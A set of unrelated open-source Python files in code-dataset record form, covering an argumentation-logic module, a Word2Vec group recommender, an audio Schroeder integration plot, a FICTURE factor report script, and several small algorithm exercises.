= set()\n for literal in state:\n if self.__is_well_formed(literal, 'argument', Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n arguments.add((arg, pos))\n elif self.__is_well_formed(literal, 'attacks', Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n counterarguments.add((arg, pos))\n att: MutableMapping[Function, Set[Literal]] = {}\n for (arg, pos) in arguments:\n attacks_ = {counterargument for counterargument in self.conflict_relation[arg]\n if (counterargument, -pos) not in counterarguments}\n\n attacks_ |= {counterargument for (counterargument, (preds, poses)) in self.argument_scheme.items()\n if -pos in poses}\n\n for attack in attacks_:\n att.setdefault(attack, set()).add(pos)\n\n return att\n\n def incomplete_reasoning(self, state: State, functor: str = 'attacks') -> Mapping[Literal, Function]:\n reasoning: MutableMapping[Literal, Function] = {}\n supporting: MutableMapping[Literal, Function] = {}\n for literal in state:\n if self.__is_well_formed(literal, functor, Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n reasoning[pos] = arg\n elif self.__is_well_formed(literal, 'supports', Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n supporting[pos] = arg\n\n incomplete_reasoning: MutableMapping[Literal, Function] = {}\n\n for pos, arg in reasoning.items():\n preds, _ = self.argument_scheme[arg]\n if not all(pred in supporting for pred in preds):\n incomplete_reasoning[pos] = arg\n\n return incomplete_reasoning\n\n def undefended_attacks(self, state: State) -> Mapping[Function, Collection[Literal]]:\n attacking: MutableMapping[Function, Set[Literal]] = {}\n defending: MutableMapping[Function, Set[Literal]] = {}\n for literal in state:\n if self.__is_well_formed(literal, 'attacks', Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n attacking.setdefault(arg, set()).add(-pos)\n elif self.__is_well_formed(literal, 'supports', Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n attacking.setdefault(arg, set()).add(pos)\n elif self.__is_well_formed(literal, 'defends', Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n defending.setdefault(arg, set()).add(pos)\n\n defended = False\n strong_defense_needed = False\n strong_defended = False\n for att_argument, att_positions in attacking.items():\n for def_argument, def_positions in defending.items():\n if self.strength_preorder.is_strictly_preceded(def_argument, att_argument):\n strong_defense_needed = True\n if self.strength_preorder.is_strictly_preceded(att_argument, def_argument):\n strong_defended = True\n if any(-att_position in def_positions for att_position in att_positions):\n defended = True\n\n if not defended or strong_defense_needed and not strong_defended:\n return attacking\n return {}\n\n def incomplete_arguments(self, state: State) -> Mapping[Literal, Collection[Literal]]:\n positions: Set[Literal] = set()\n facts: Set[Function] = set()\n hypotheses: Set[Function] = set()\n arguments: Set[Function] = set()\n\n for literal in state:\n if self.__is_well_formed(literal, 'position', Literal):\n pos = literal.predicate.arguments[0]\n assert isinstance(pos, Literal)\n positions.add(pos)\n elif self.__is_well_formed(literal, 'argument', Function, Literal):\n arg = literal.predicate.arguments[0]\n assert isinstance(arg, Function)\n if arg.symbol == 'fact':\n facts.add(arg)\n elif arg.symbol == 'hyp':\n hypotheses.add(arg)\n else:\n arguments.add(arg)\n\n supported: Set[Literal] = {f.arguments[0] for f in facts if isinstance(f.arguments[0], Literal)} | {\n h.arguments[0] for h in hypotheses if isinstance(h.arguments[0], Literal)}\n incomplete: MutableMapping[Literal, Set[Literal]] = {}\n for pos in positions:\n if pos not in supported:\n incomplete[pos] = set()\n for arg in arguments:\n assert isinstance(arg, Function)\n assert arg in self.argument_scheme\n preds, poses = self.argument_scheme[arg]\n incomplete_ = set()\n for pred in preds:\n if pred not in supported:\n incomplete_.add(pred)\n if not incomplete_:\n supported.update(poses)\n next_incomplete = dict(incomplete)\n for pos, preds_ in incomplete.items():\n if preds_ <= poses:\n del next_incomplete[pos]\n supported.add(pos)\n incomplete = next_incomplete\n else:\n for pos in poses:\n incomplete.setdefault(pos, set())\n incomplete[pos].update(incomplete_)\n return incomplete\n\n def do_state(self, action: Action, state: State) -> State:\n if not state:\n return self.__do_initial_state(action)\n incomplete_arguments = self.incomplete_arguments(state)\n if incomplete_arguments:\n return self.__do_reasoning(action, state, incomplete_arguments, 'argument')\n incomplete_attacks = self.incomplete_reasoning(state, 'attacks')\n if incomplete_attacks:\n incomplete = {}\n for lit, arg in incomplete_attacks.items():\n incomplete[lit] = self.unsupported_literals(state, arg)\n return self.__do_reasoning(action, state, incomplete, 'supports')\n incomplete_defends = self.incomplete_reasoning(state, 'defends')\n if incomplete_defends:\n incomplete = {}\n for lit, arg in incomplete_defends.items():\n incomplete[lit] = self.unsupported_literals(state, arg)\n return self.__do_reasoning(action, state, incomplete, 'supports')\n undefended_attacks = self.undefended_attacks(state)\n if undefended_attacks:\n for attack, att_posses in undefended_attacks.items():\n if attack.symbol == 'exo_e':\n if any(self.__is_well_formed(literal, 'defends', Function, Literal) for literal in state):\n continue\n\n for possible_defence in self.argument_scheme:\n if attack.symbol == 'fact' and possible_defence.symbol != 'fact':\n continue\n if self.strength_preorder.is_strictly_preceded(possible_defence, attack):\n continue\n if not self.conflict_relation.is_similar(attack, possible_defence):\n if possible_defence not in self.argument_scheme:\n continue\n if not any(-att_pos in self.argument_scheme[possible_defence][1] for att_pos in att_posses):\n continue\n if possible_defence.symbol == 'fact':\n f = possible_defence.arguments[0]\n assert isinstance(f, Literal)\n if f not in self.fact_set:\n continue\n if possible_defence.symbol == 'hyp':\n if not self.strength_preorder.is_preceded(attack, possible_defence):\n continue\n return self.__do_defense(action, state, undefended_attacks)\n if is_consolidate(action):\n return self.__do_consolidate(state)\n att = self.attacks(state)\n if att:\n return self.__do_attack(action, state, att)\n return state\n\n def poss(self, action: Action, situation: Situation) -> bool:\n return self.poss_state(action, situation.state)\n\n def poss_state(self, action: Action, state: State) -> bool:\n pass\n\n\ndef is_consolidate(action: Action) -> bool:\n return action.symbol == 'consolidate' and not action.arguments\n\n\nconsolidate_action: Action = Function('consolidate')\n\n\ndef fact(lit: Literal) -> Function:\n return Function('fact', (lit,))\n\n\ndef hyp(lit: Literal) -> Function:\n return Function('hyp', (lit,))\n\n\ndef suff_p(cond: Literal, pos: Literal) -> Function:\n return Function('suff_p', (Function('cond_for', (cond, pos)),))\n\n\ndef necc_p(cond: Literal, pos: Literal) -> Function:\n return Function('necc_p', (Function('cond_for', (cond, pos)),))\n\n\ndef suff_e(cond: Literal, pos: Literal) -> Function:\n return Function('suff_e', (Function('cond_for', (cond, pos)),))\n\n\ndef necc_e(cond: Literal, pos: Literal) -> Function:\n return Function('necc_e', (Function('cond_for', (cond, pos)),))\n\n\ndef sec_suff_p(cond: Literal, pos: Literal) -> Function:\n return Function('sec_suff_p', (Function('cond_for', (cond, pos)),))\n\n\ndef sec_necc_p(cond: Literal, pos: Literal) -> Function:\n return Function('sec_necc_p', (Function('cond_for', (cond, pos)),))\n\n\ndef sec_suff_e(cond: Literal, pos: Literal) -> Function:\n return Function('sec_suff_e', (Function('cond_for', (cond, pos)),))\n\n\ndef exo_e(pos: Literal) -> Function:\n return Function('exo_e', (Function('cond_for', (pos, Function('exo', (pos,)))),))\n\n\ndef position_literal(pos: Literal, sign: bool = True) -> Literal:\n return Literal(Predicate('position', (pos,)), sign)\n\n\ndef argument_literal(arg: Function, pos: Literal, sign: bool = True) -> Literal:\n return Literal(Predicate('argument', (arg, pos)), sign)\n\n\ndef counterargument_literal(arg: Function, pos: Literal, sign: bool = True) -> Literal:\n return Literal(Predicate('counterargument', (arg, pos)), sign)\n\n\ndef supports_literal(arg: Function, pos: Literal, sign: bool = True) -> Literal:\n return Literal(Predicate('supports', (arg, pos)), sign)\n\n\ndef attacks_literal(arg: Function, pos: Literal, sign: bool = True) -> Literal:\n return Literal(Predicate('attacks', (arg, pos)), sign)\n\n\ndef defends_literal(arg: Function, pos: Literal, sign: bool = True) -> Literal:\n return Literal(Predicate('defends', (arg, pos)), sign)\n\n\ndef exo_literal(pos: Literal, sign: bool = True) -> Literal:\n return Literal(Predicate('exo', (pos,)), sign)\n\n\ndef position_action(arg: Function, pos: Literal) -> Action:\n return Function('position', (arg, pos))\n\n\ndef argument_action(arg: Function, pos: Literal) -> Action:\n return Function('argument', (arg, pos))\n\n\ndef counterargument_action(arg: Function, pos: Literal) -> Action:\n return Function('counterargument', (arg, pos))\n\n\ndef supports_action(arg: Function, pos: Literal) -> Action:\n return Function('supports', (arg, pos))\n\n\ndef attacks_action(arg: Function, pos: Literal) -> Action:\n return Function('attacks', (arg, pos))\n\n\ndef defends_action(arg: Function, pos: Literal) -> Action:\n return Function('defends', (arg, pos))\n","repo_name":"Entze/SitCalcPy","sub_path":"scpy/causal_setting/dialectic_causal_setting.py","file_name":"dialectic_causal_setting.py","file_ext":"py","file_size_in_byte":22918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43079033594","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom random import sample\nimport re\n\nimport string\nimport nltk\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.probability import FreqDist\n\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer \n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nimport gensim\nimport statistics\n\n\nstop_words=set(stopwords.words(\"english\"))\n \nnltk.download('stopwords')\nnltk.download('punkt')\nnltk.download('wordnet')\n\nstop_words=set(stopwords.words(\"english\"))\nlemmatizer = WordNetLemmatizer() \n\n\ndef cleaning_bow_for_training(data):\n \n new_data=data.dropna(how='all', axis=1)\n bow=data.iloc[:,2:].values.tolist()\n \n cleaned_data = [\n [w for w in l if isinstance(w, str)] \n for l in bow\n ]\n return cleaned_data\n\ndef running_model(training_bow):\n model = gensim.models.Word2Vec(training_bow, min_count=1, sg=1)\n model.train(training_bow, total_examples=model.corpus_count, epochs=model.epochs)\n model.wv\n return model\n\n\ndef tags_from_lists(bow, model):\n tags_lists=[]\n for lst in bow:\n while True:\n if len(lst) == 0:\n break\n try:\n tags=model.wv.most_similar(positive=lst, topn=20)\n tags_lists.append(tags)\n except KeyError as e:\n search = re.search(\"'(\\w+)'\", e.args[0])\n if search:\n word = search.group(1)\n else:\n word = ''\n print(word)\n lst.remove(word)\n else:\n break\n return tags_lists\n\n\ndef transforming_in_bow(text, lemmatizer):\n \n sentence = text.translate(str.maketrans('', '',string.punctuation)).split(' ')\n bow = []\n for word in sentence:\n lowcase_text_word=word.lower()\n lemmatized_word=lemmatizer.lemmatize(lowcase_text_word)\n if lemmatized_word not in stop_words:\n bow.append(lemmatized_word)\n return bow\n\ndef tags_from_text(bow, model):\n while True:\n if len(bow) == 0:\n return []\n try:\n tags=model.wv.most_similar(positive=bow, topn=20)\n except KeyError as e:\n search = re.search(\"'(\\w+)'\", e.args[0])\n if search:\n word = search.group(1)\n else:\n word = '' \n print(word)\n bow.remove(word)\n else:\n return tags\n \n\n\n\n\n\n\ndef relevance(tags_text, tags_groups, model):\n distance_lists_max=[]\n for group in tags_groups:\n group_id=[]\n for tag_g in group:\n for tag in tags_text:\n distance=model.wv.distance(tag[0], tag_g[0])\n proportion=1-distance\n relevance=proportion*tag[1]\n group_id.append(relevance)\n distance_lists_max.append(max(group_id))\n return distance_lists_max\n\n\n\ndef relevance_mean(tags_text, tags_groups, model):\n distance_lists_max=[]\n for group in tags_groups:\n group_id=[]\n for tag_g in group:\n for tag in tags_text:\n distance=model.wv.distance(tag[0], tag_g[0])\n proportion=1-distance\n relevance=proportion*tag[1]\n group_id.append(relevance)\n distance_lists_max.append(statistics.mean(group_id))\n return distance_lists_max\n\ndef relevance_count(tags_text, tags_groups, model):\n distance_lists_max=[]\n for group in tags_groups:\n group_id=[]\n for tag_g in group:\n for tag in tags_text:\n distance=model.wv.distance(tag[0], tag_g[0])\n proportion=1-distance\n relevance=proportion*tag[1]\n if relevance>=0.7:\n group_id.append(relevance)\n distance_lists_max.append(len(group_id))\n return distance_lists_max\n\ndef relevance_words(bow, bow_gr, model):\n distance_lists_max=[]\n for group in bow_gr:\n group_id=[]\n for tag_g in group:\n for tag in bow:\n try:\n distance=model.wv.distance(tag, tag_g)\n except:\n if tag in bow:\n bow.remove(tag)\n proportion=1-distance\n group_id.append(proportion)\n distance_lists_max.append(statistics.mean(group_id))\n return distance_lists_max\n\n\n\n\n\n\n\n\n\n\ndef get_the_recommended_titles(relevance, titles_data):\n \n distance_list_titles=pd.DataFrame(relevance, columns=['member'])\n titles_values=pd.merge(left=titles_data[['group_name']], right=distance_list_titles, left_index=True, right_index=True)\n high_values=titles_values.loc[titles_values['member']>=0.10]\n recommended_gr=high_values.loc[high_values['member']>=(high_values['member'].max()-0.03)]\n sorted_rec_gr = recommended_gr.sort_values('member', ascending=False)\n \n return sorted_rec_gr\n\n\n\ndef get_the_recommended_titles_count(relevance, titles_data):\n \n distance_list_titles=pd.DataFrame(relevance, columns=['member'])\n titles_values=pd.merge(left=titles_data[['group_name']], right=distance_list_titles, left_index=True, right_index=True)\n high_values=titles_values.loc[titles_values['member']>=1]\n recommended_gr=high_values.loc[high_values['member']>=(high_values['member'].max()-10)]\n sorted_rec_gr = recommended_gr.sort_values('member', ascending=False)\n \n return sorted_rec_gr\n\n\n\n\ndef input_text_recommendation(text, model, tags_groups, group_titles):\n bow = transforming_in_bow(text,lemmatizer)\n tags_text=tags_from_text(bow, model)\n if len(tags_text) == 0:\n return \"No recommendations.\"\n tags_relevance=relevance(tags_text, tags_groups, model)\n recommended=get_the_recommended_titles(tags_relevance, group_titles).head(10)\n return recommended[['group_name']]\n\n\ndef input_text_recommendation_mean(text, model, tags_groups, group_titles):\n bow = transforming_in_bow(text,lemmatizer)\n tags_text=tags_from_text(bow, model)\n if len(tags_text) == 0:\n return \"No recommendations.\"\n tags_relevance=relevance_mean(tags_text, tags_groups, model)\n recommended=get_the_recommended_titles(tags_relevance, group_titles).head(10)\n return recommended[['group_name']]\n\n\ndef input_text_recommendation_count(text, model, tags_groups, group_titles):\n bow = transforming_in_bow(text,lemmatizer)\n tags_text=tags_from_text(bow, model)\n if len(tags_text) == 0:\n return \"No recommendations.\"\n tags_relevance=relevance_count(tags_text, tags_groups, model)\n recommended=get_the_recommended_titles_count(tags_relevance, group_titles).head(10)\n return recommended[['group_name']]\n\ndef input_text_recommendation_words(text, model, groups_bow, group_titles):\n bow = transforming_in_bow(text,lemmatizer)\n# tags_text=tags_from_text(bow, model)\n# if len(tags_text) == 0:\n# return \"No recommendations.\"\n tags_relevance=relevance_words(bow, groups_bow, model)\n recommended=get_the_recommended_titles(tags_relevance, group_titles).head(10)\n return recommended[['group_name']]\n\n\n\n\ndef transform_concat_lists(df):\n lst=df.values.tolist()\n big_list=[]\n for small_lst in lst:\n big_list+=small_lst\n return big_list\n\ndef perf_measure(y_actual, y_hat):\n TP = 0\n FP = 0\n TN = 0\n FN = 0\n for i in range(len(y_hat)): \n if y_actual[i]==y_hat[i]==1:\n TP += 1\n if y_hat[i]==1 and y_actual[i]!=y_hat[i]:\n FP += 1\n if y_actual[i]==y_hat[i]==0:\n TN += 1\n if y_hat[i]==0 and y_actual[i]!=y_hat[i]:\n FN += 1\n print('TP=',TP,'FP=',FP,'TN=',TN,'FN=',FN)\n return TP, FP, TN, FN\n \n \n \n ","repo_name":"inesa-lisnic/A-recommendation-system-paradigm-based-on-Meetup-database","sub_path":"algorithm_functions.py","file_name":"algorithm_functions.py","file_ext":"py","file_size_in_byte":8072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16673493255","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.integrate as integrate\nimport scipy.io.wavfile as wavfile\n\nfs, x = wavfile.read(\"Python/Examples/h1.wav\")\n\n\n\n\nT = 1500\nx = x[0:T]\nx_range = np.arange(0,len(x)/fs,1/fs)\n\n\n\n#x = np.abs(x) / np.max(x)\nsch_sum = np.cumsum(x[::-1]**2)[::-1]\nsch_sum_db = 10.0 * np.log10(sch_sum / np.max(sch_sum))\n\nsch_trapz = integrate.cumtrapz(x[::-1]**2,initial=0)[::-1]\nsch_trapz_db = 10.0 * np.log10(sch_trapz / np.max(sch_trapz))\n\nplt.plot(x_range,sch_trapz_db)\nplt.plot(x_range,sch_sum_db)\nplt.xlabel(\"Zeit in [s]\")\nplt.ylabel(\"Amplitude\")\nplt.title(\"Schroeder Rückwärtsintegration\")\nplt.show()","repo_name":"DennisR96/Audio_DSP","sub_path":"Python/Examples/Schroeder.py","file_name":"Schroeder.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72988256212","text":"import heapq\nclass Solution:\n def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n adj_list = dict()\n distance = [math.inf for i in range(n)]\n distance[k-1] =0\n time = 0 \n pq = []\n heapq.heapify( pq)\n heapq.heappush(pq, [time, k])\n for u, v, w in times:\n if not adj_list.get(u, False):\n adj_list[u] = []\n if not adj_list.get(v, False):\n adj_list[v] = []\n adj_list[u].append((v,w))\n while(pq):\n Totaltime, node = heappop(pq)\n for neigh, time in adj_list[node]:\n if distance[neigh-1] > Totaltime + time:\n distance[neigh-1] = Totaltime + time\n heapq.heappush(pq, [distance[neigh-1], neigh])\n if max(distance) == math.inf:\n return -1 \n return max(distance)","repo_name":"prbln/Leetcode","sub_path":"744-network-delay-time/network-delay-time.py","file_name":"network-delay-time.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27867519299","text":"import sys, os, copy, gc, re, gzip, pickle, argparse, logging, warnings\nimport numpy as np\nimport pandas as pd\nimport matplotlib.colors\nfrom jinja2 import Environment, FileSystemLoader\n\nfrom ficture.utils.visualize_factors import visual_hc, image_to_base64\n\ndef factor_report(_args):\n\n parser = argparse.ArgumentParser(prog=\"factor_report\")\n parser.add_argument('--path', type=str, help='')\n parser.add_argument('--pref', type=str, help='')\n parser.add_argument('--model_id', type=str, default='', help='')\n parser.add_argument('--color_table', type=str, default='', help='')\n parser.add_argument('--n_top_gene', type=int, default=20, help='')\n parser.add_argument('--min_top_gene', type=int, default=10, help='')\n parser.add_argument('--max_pval', type=float, default=0.001, help='')\n parser.add_argument('--min_fc', type=float, default=1.5, help='')\n parser.add_argument('--output_pref', type=str, default='', help='')\n\n parser.add_argument('--hc_tree', action='store_true')\n parser.add_argument('--n_top_gene_on_tree', type=int, default=10, help='')\n parser.add_argument('--tree_figure', type=str, default='', help='')\n parser.add_argument('--cprob_cut', type=str, default='.99', help='Only visualize top factors with cumulative probability > cprob_cut')\n parser.add_argument('--model', type=str, default='', help='')\n parser.add_argument('--circle_if', type=int, default=24, help='')\n parser.add_argument('--remake_tree', action='store_true')\n parser.add_argument('--circle', action='store_true')\n parser.add_argument('--vertical', action='store_true')\n args = parser.parse_args(_args)\n\n path=args.path\n pref=args.pref\n ntop = args.n_top_gene\n mtop = args.min_top_gene\n pval_max = args.max_pval\n fc_min = args.min_fc\n ejs = os.path.join(os.path.dirname(__file__), \"factor_report.template.html\")\n if not os.path.isfile(ejs):\n sys.exit(f\"Template file {ejs} not found\")\n if args.remake_tree or args.circle or args.vertical:\n args.hc_tree = True\n\n model_id = args.model_id\n if model_id == '':\n model_id = args.pref\n\n output_pref = args.output_pref\n if output_pref == '':\n output_pref = path+\"/\"+pref\n\n # Color code\n color_f = args.color_table\n if os.path.isfile(args.color_table):\n color_table = pd.read_csv(args.color_table, sep='\\t')\n else:\n color_f = path+\"/figure/\"+model_id+\".rgb.tsv\"\n color_table = pd.read_csv(color_f, sep='\\t')\n K = color_table.shape[0]\n factor_header = np.arange(K).astype(str)\n color_table.Name = color_table.Name.astype(int)\n color_table.sort_values(by = 'Name', inplace=True)\n color_table.index = color_table.Name.values\n color_table['RGB'] = [','.join(x) for x in np.clip((color_table.loc[:, ['R','G','B']].values * 255).astype(int), 0, 255).astype(str) ]\n color_table['HEX'] = [ matplotlib.colors.to_hex(v) for v in np.array(color_table.loc[:, ['R','G','B']]) ]\n node_color = {str(i):v['HEX'] for i,v in color_table.iterrows() }\n\n\n # Posterior count\n f=path+\"/\"+pref+\".posterior.count.tsv.gz\"\n post = pd.read_csv(f, sep='\\t')\n recol = {}\n for u in post.columns:\n v = re.match('^[A-Za-z]*_*(\\d+)$', u.strip())\n if v:\n recol[v.group(0)] = v.group(1)\n post.rename(columns=recol, inplace=True)\n post_umi = post.loc[:, factor_header].sum(axis = 0).astype(int).values\n post_weight = post.loc[:, factor_header].sum(axis = 0).values\n post_weight /= post_weight.sum()\n\n # DE genes\n f=path+\"/DE/\"+pref+\".bulk_chisq.tsv\"\n de = pd.read_csv(f, sep='\\t')\n de.factor = de.factor.astype(int)\n top_gene = []\n top_gene_anno = []\n de['Rank'] = 0\n # Temporary: shorten unspliced gene names\n de.gene = de.gene.str.replace('unspl_', 'u_')\n # Top genes by Chi2\n de.sort_values(by=['factor','Chi2'],ascending=False,inplace=True)\n for k in range(K):\n v = de.loc[de.factor.eq(k), 'gene'].iloc[:args.n_top_gene_on_tree].values\n top_gene_anno.append(', '.join(v))\n de.loc[de.factor.eq(k), 'Rank'] = np.arange(de.factor.eq(k).sum())\n v = de.loc[de.factor.eq(k) & ( (de.Rank < mtop) | \\\n ((de.pval <= pval_max) & (de.FoldChange >= fc_min)) ), \\\n 'gene'].iloc[:ntop].values\n if len(v) == 0:\n top_gene.append([k, '.'])\n else:\n top_gene.append([k, ', '.join(v)])\n # Top genes by fold change\n de.sort_values(by=['factor','FoldChange'],ascending=False,inplace=True)\n for k in range(K):\n de.loc[de.factor.eq(k), 'Rank'] = np.arange(de.factor.eq(k).sum())\n v = de.loc[de.factor.eq(k) & ( (de.Rank < mtop) | \\\n ((de.pval <= pval_max) & (de.FoldChange >= fc_min)) ), \\\n 'gene'].iloc[:ntop].values\n if len(v) == 0:\n top_gene[k].append('.')\n else:\n top_gene[k].append(', '.join(v))\n # Top genes by absolute weight\n for k in range(K):\n v = post.gene.iloc[np.argsort(post.loc[:, str(k)].values)[::-1][:ntop] ].values\n top_gene[k].append(', '.join(v))\n\n # Summary\n table = pd.DataFrame({'Factor':np.arange(K), 'RGB':color_table.RGB.values,\n 'Weight':post_weight, 'PostUMI':post_umi,\n 'TopGene_pval':[x[1] for x in top_gene],\n 'TopGene_fc':[x[2] for x in top_gene],\n 'TopGene_weight':[x[3] for x in top_gene] })\n table.sort_values(by = 'Weight', ascending = False, inplace=True)\n\n f = output_pref+\".factor.info.tsv\"\n table.to_csv(f, sep='\\t', index=False, header=True, float_format=\"%.5f\")\n\n f = output_pref+\".factor.info.tsv\"\n with open(f, 'r') as rf:\n lines = rf.readlines()\n header = lines[0].strip().split('\\t')\n rows = [ list(enumerate(row.strip().split('\\t') )) for row in lines[1:]]\n\n # Load template\n env = Environment(loader=FileSystemLoader(os.path.dirname(ejs)))\n template = env.get_template(os.path.basename(ejs))\n\n image_base64 = None\n tree_alt = None\n tree_caption = None\n\n if args.hc_tree:\n # Hierarchical clustering\n m = re.match(\"^[0\\.]*(\\d+)$\", args.cprob_cut)\n if m is None:\n sys.exit(f\"Invalid --cprob_cut, please use a number between 0 and 1 (e.g. 0.99)\")\n cprob_label = m.group(1)\n cprob_cut = float(args.cprob_cut)\n\n tree_f = args.tree_figure\n if not os.path.exists(args.tree_figure) or args.remake_tree:\n tree_f = os.path.dirname(color_f) + '/' + pref + \".coshc.\"+cprob_label+\".tree.png\"\n if not os.path.exists(tree_f) or args.remake_tree:\n model_f = args.model\n if not os.path.exists(args.model):\n model_f = path + \"/\" + model_id + \".model_matrix.tsv.gz\"\n if not os.path.exists(model_f):\n print(\"Cannot find model file, will cluster based on posterior count\")\n model = post\n else:\n model = pd.read_csv(model_f, sep='\\t')\n model_prob = np.array(model.iloc[:, 1:]).T + .1\n model_prob = model_prob / model_prob.sum(axis = 1).reshape((-1,1))\n\n circle = args.circle\n if not circle and args.circle_if > 0:\n v = np.argsort(post_weight)[::-1]\n w = np.cumsum(post_weight[v] )\n k = np.arange(K)[w > cprob_cut][0]\n if k > args.circle_if:\n circle = True\n tree = visual_hc(model_prob, post_weight, top_gene_anno, \\\n node_color = node_color, circle = circle, \\\n output_f = tree_f, cprob_cut = cprob_cut)\n print(f\"Tree figure path: {tree_f}\")\n image_base64 = image_to_base64(tree_f)\n\n tree_alt = \"Hierarchical clustering of factors based on pairwise coine distance\"\n tree_caption = \"Clustering of factors based on pairwise coine distance. Factors with high abundance jointly accounting for \" + args.cprob_cut + \" of observations are displayed.\"\n\n # Render the HTML file\n html_output = template.render(header=header, rows=rows, image_base64=image_base64, tree_image_alt=tree_alt, tree_image_caption=tree_caption)\n\n f=output_pref+\".factor.info.html\"\n with open(f, \"w\") as html_file:\n html_file.write(html_output)\n\n print(f)\n","repo_name":"seqscope/ficture","sub_path":"ficture/scripts/factor_report.py","file_name":"factor_report.py","file_ext":"py","file_size_in_byte":8446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"20373555901","text":"#!/usr/bin/python3\n\"\"\"Maria and Ben are playing a game.\n Given a set of consecutive integers\n starting from 1 up to and including n,\n they take turns choosing a prime number\n from the set and removing that number\n and its multiples from the set.\n The player that cannot make a move loses the game.\n\"\"\"\n\n\ndef isWinner(x, nums):\n \"\"\" isWinner \"\"\"\n player = {\"Maria\": 0, \"Ben\": 0}\n n = max(nums)\n primes = [0, 0, 2]\n add_prime(max(nums), primes)\n for round in range(x):\n _sum = sum((i != 0 and i <= nums[round])\n for i in primes[:nums[round] + 1])\n if (_sum % 2):\n winner = \"Maria\"\n else:\n winner = \"Ben\"\n if winner:\n player[winner] += 1\n if player[\"Maria\"] > player[\"Ben\"]:\n return \"Maria\"\n elif player[\"Ben\"] > player[\"Maria\"]:\n return \"Ben\"\n\n return None\n\n\ndef add_prime(n, primes):\n \"\"\" Add prime to list \"\"\"\n last_prime = primes[-1]\n if n > last_prime:\n for i in range(last_prime + 1, n + 1):\n if isPrime(i):\n primes.append(i)\n else:\n primes.append(0)\n\n\ndef isPrime(number):\n \"\"\" check prime number \"\"\"\n for i in range(2, int(number ** 0.5) + 1):\n if not number % i:\n return False\n return True\n","repo_name":"Oluwateezzy/alx-interview","sub_path":"0x0A-primegame/0-prime_game.py","file_name":"0-prime_game.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25738387060","text":"# color\nred = '\\033[91m'\ngreen = '\\033[92m'\nyellow = '\\033[93m'\nblue = '\\033[94m'\nreset = '\\033[0m'\n\nglobal error_display \nglobal info_display\nglobal ok_display\n\nerror_display = True\ninfo_display = False\nok_display = True\n\ndef ERRORF(msg):\n if error_display:\n print(\"{}[-][ERROR]{} {}\".format(red, reset, msg))\n\ndef INFOF(msg):\n if info_display:\n print(\"{}[+][INFO]{} {}\".format(yellow, reset, msg))\n\ndef OKF(msg):\n if ok_display:\n print(\"{}[+][OK]{} {}\".format(green, reset, msg))\n","repo_name":"valour01/arm_disasssembler_study","sub_path":"adapter/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"67"} +{"seq_id":"22740185615","text":"\"\"\"\nThis problem was asked by Microsoft.\n\nA number is considered perfect if its digits sum up to exactly 10.\n\nGiven a positive integer n, return the n-th perfect number.\n\nFor example, given 1, you should return 19. Given 2, you should return 28.\n\"\"\"\n\n# the first perfect num is 19\n# the second perfect num is 28\n# the third +ive num is 37\n\n# closer look reveals:\n# n=1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12\n# -----------------------------------------------\n# 19, 28, 37 46, 64, 46, 73, 82, 91, 100, 109, 118\n\n# so 19+(n*9)\n\n# but there is one problem in this method 10th->100 number if not a perfect num\n# 10th number should be the next one then 10th=>109\n# so we'll also need to push 11th num to be the 12th num and so on\n\n# note that the outliers of this method exist in form of {100, 199, 299,1000, 10000,etc all nums that don't sum to 10}\n# before we return the result we need to adjust for the outliers:\n\n# the result should be\n# n= 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12\n# -----------------------------------------------\n# 19, 28, 37 46, 64, 46, 73, 82, 91, 109, 118, 127\n\n\ndef find_perfect_num(n):\n if n ==0:\n return 'nums start from 1'\n\n n_th_num = 19 # start with 19\n count = 0 # iterator\n\n while(True):\n curr_sum = sum(list(map(int, str(n_th_num))))\n\n if curr_sum ==10:\n count+=1\n\n if count == n:\n return n_th_num\n\n n_th_num += 9\n\n#\n# def outliers(n): # experiment to see if there is a pattern to the outliers -> There isn't :(\n# l=[]\n#\n# for i in range(1, n):\n# num = ((i+1)*9)+1\n#\n# s = sum(list(map(int, str(num))))\n#\n# if s!=10:\n# l.append(num)\n#\n# return l\n\n\nif __name__ == '__main__':\n # print(find_perfect_num(1))\n # print(find_perfect_num(9))\n # print(find_perfect_num(11))\n # print(find_perfect_num(21))\n # print(find_perfect_num(91))\n # print(find_perfect_num(88))\n #\n for i in range(1, 101):\n print(\"{}#: {}\".format(i, find_perfect_num(i)))\n\n # 